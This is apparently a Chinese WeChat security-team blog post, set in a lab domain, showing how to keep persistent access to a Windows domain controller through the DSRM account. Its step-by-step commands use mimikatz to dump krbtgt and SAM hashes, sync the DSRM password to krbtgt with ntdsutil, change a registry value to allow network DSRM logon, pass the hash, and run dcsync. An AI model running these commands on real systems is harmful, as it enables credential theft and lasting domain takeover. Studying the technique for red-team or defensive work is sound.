点击上方蓝字关注我们
0x00 前言
DSRM(Directory Services Restore Mode,目录服务恢复模式)是Windows域环境中域控制器的安全模式启动选项,但是只允许在控制台登陆,可以通过修改注册表的方式,来通过网络验证登陆到DC服务器上。
在每个域控制器都有一个本地管理员账户——也是DSRM账户,DSRM主要作用是使出现故障或崩溃的域环境恢复正常运行,修改DSRM密码的最基本方法是在DC上运行ntdsutil命令行工具。
此方法适用于Windows Server 2008及以上系统(2008需要安装补丁:KB961320)
0x01 本地测试
域名:god.com
域控服务器:Win-2008DC:10.10.10.30
域成员服务器:win-2008-1:10.10.10.10
1、使用mimikatz查看krbtgt账户的NTLM Hash
privilege::debuglsadump::lsa /patch /name:krbtgt//krbtgt hash953eb0591ac152c17edfa514021c47f6
2、获取本地管理员的NTLM Hash
privilege::debugtoken::elevatelsadump::samafffeba176210fad4628f0524bfe1942
3、DSRM账号与krbtgt的NTLM Hash同步
NTDSUTILset dsrm passwordsync from domain account krbtgtqq
4、查看DSRM的NTLM是否同步
lsadump::sam
5、修改DSRM登录方式
在注册表中新建:
HKLMSystemCurrentControlSetControlLsaDsrmAdminLogonBehavior 项,值为2。
DSRM的三种登录方式:(推荐设置2的原因是在我设置1的时候出现error,因为没有重启ad,但是值为2是立即生效的,在Windows Server 2000以后的版本的操作系统中,对DSRM使用控制台登录域控制器进行了限制。如果要使用DSRM账号通过网络登录域控器,需要将该值设置为2)
0:默认值,只有当域控器重启并进入DSRM模式时,才可以使用DSRM管理员账号;
1:只有当本地AD、DS服务停止时,才可以使用DSRM管理员账号登录域控制器;
2:在任何情况下都可以使用DSRM管理员账号登录域控器。
reg add HKLMSystemCurrentControlSetControlLsa /v DsrmAdminLogonBehavior /t REG_DWORD /d 2 /freg add HKLMSystemCurrentControlSetControlLsa /v DsrmAdminLogonBehavior /t REG_DWORD /d 0 /f//powershellNew-ItemProperty "HKLMSystemCurrentControlSetControlLsa" -name "DsrmAdminLogonBehavior" -value 2 -propertyType DWORD
6、使用DSRM账号通过网络远程登录域控器
使用mimikatz进行哈希传递,在域成员机器的管理员模式打开mimikatz(NThash为krbtgt)
privilege::debugsekurlsa::pth /domain:WIN-2008DC /user:Administrator /ntlm:953eb0591ac152c17edfa514021c47f6/domain:域控的主机名/user:本机管理员用户/NTLM:krbtgt的hash
7、使用mimikatz远程转存储krbtgt的NTLM Hash
哈希传递完成后,会弹出一个命令行窗口,并在该窗口中打开mimikatz,输入如下命令:
privilege::debuglsadump::dcsync /domain:god.com /dc:WIN-2008DC /user:krbtgt/dimain 域名/dc:域控主机名
往期文章:
长按关注
灼剑(Tsojan)安全团队
点个在看你最好看
本文始发于微信公众号(哈拉少安全小队):域渗透|域权限维持之DSRM
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论